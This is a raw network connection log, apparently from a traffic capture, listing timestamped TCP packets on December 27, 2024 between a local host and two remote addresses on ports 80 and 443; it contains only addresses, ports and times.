                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.345319986 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.345465899 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.346201897 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.346292019 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.346342087 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.347270012 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.347408056 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.347484112 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.348429918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.348474026 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.348521948 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.349468946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.349613905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.349781036 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.350549936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.350750923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.350804090 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.351596117 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.351739883 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.351800919 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.352689981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.352792978 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.352844954 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.353770971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.353864908 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.353924036 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.354862928 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.354943991 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.355000019 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.355921984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.355993032 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.356041908 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.356956959 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.357084036 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.357172012 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.358055115 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.358171940 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.358330965 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.359117985 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.359225988 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.359317064 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.360224009 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.360317945 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.360364914 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.361288071 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.361502886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.361557007 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.362363100 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.362471104 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.362524033 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.363452911 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.363584042 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.363895893 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.364537954 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.364618063 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.364706993 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.365622044 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.365712881 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.365772009 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.366703033 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.366754055 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.366826057 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.367717028 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.367841959 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.368004084 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.368823051 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.368925095 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.369046926 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.369906902 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.370002985 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.370071888 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.370987892 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.371105909 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.371191025 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.372047901 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.372180939 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.372315884 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.546231985 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.546278000 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.547295094 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.547307014 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.547342062 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.548250914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.548357010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.548402071 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.549299955 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.549432993 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.549478054 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.550391912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.550455093 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.550499916 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.551481962 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.551573038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.551620007 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.552565098 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.552664042 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.552721977 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.553625107 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.553735971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.553802013 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.554721117 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.554877996 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.554929018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.555819035 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.555886984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.555933952 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.556859016 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.556948900 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.556999922 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.557984114 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.558058977 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.558105946 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.559047937 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.559240103 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.559297085 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.560123920 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.560195923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.560353994 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.561194897 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.561316967 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.561371088 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.562275887 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.562339067 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.562485933 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.563327074 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.563477993 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.563517094 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.564403057 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.564491987 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.564539909 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.565462112 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.565561056 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.565610886 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.566525936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.566662073 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.566705942 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.567621946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.567728996 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.567776918 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.568684101 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.568830013 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.568902969 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.569771051 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.569885969 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.569948912 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.570832014 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.571016073 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.571086884 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.571960926 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.572032928 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.572173119 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.572994947 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.573120117 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.573174953 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.574079037 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.574202061 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.574255943 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.575139046 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.575285912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.575407028 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.576176882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.748991966 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.749066114 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.750089884 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.750132084 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.750140905 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.751077890 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.751132011 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.751169920 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.752182961 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.752233982 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.752289057 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.753237009 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.753293037 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.753366947 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.754301071 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.754373074 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.754374027 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.755392075 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.755453110 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.755477905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.756458998 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.756514072 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.756599903 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.757607937 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.757642984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.757699013 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.758632898 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.758652925 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.758682013 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.759726048 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.759824038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.759874105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.760749102 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.760809898 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.760859966 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.761833906 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.761878014 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.761878967 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.762918949 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.762980938 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.763015032 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.763983965 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.764054060 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.764079094 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.765080929 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.765151978 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.765188932 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.766138077 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.766192913 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.766263008 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.767215014 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.767278910 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.767311096 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.820168018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904012918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904126883 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904223919 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904479980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904697895 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904752016 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.904850006 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.905776024 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.905860901 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.905908108 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.906857967 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.906944990 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.906991959 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.907996893 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.908047915 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.908204079 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.909012079 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.909059048 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.909121037 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.910115957 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.910170078 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.910202980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.911164999 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.911269903 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.911331892 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.912257910 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.912295103 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.912359953 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.913324118 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.913372993 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302331924 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302490950 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302515030 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.864680052 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.864717007 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.864809990 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.867547035 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.867562056 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.077198029 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.077399969 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.079272985 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.079283953 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.079525948 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.101902962 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.102066994 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.102072954 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.102215052 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.147325993 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.763416052 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.763537884 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.763762951 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.764751911 CET49817443192.168.2.620.198.118.190
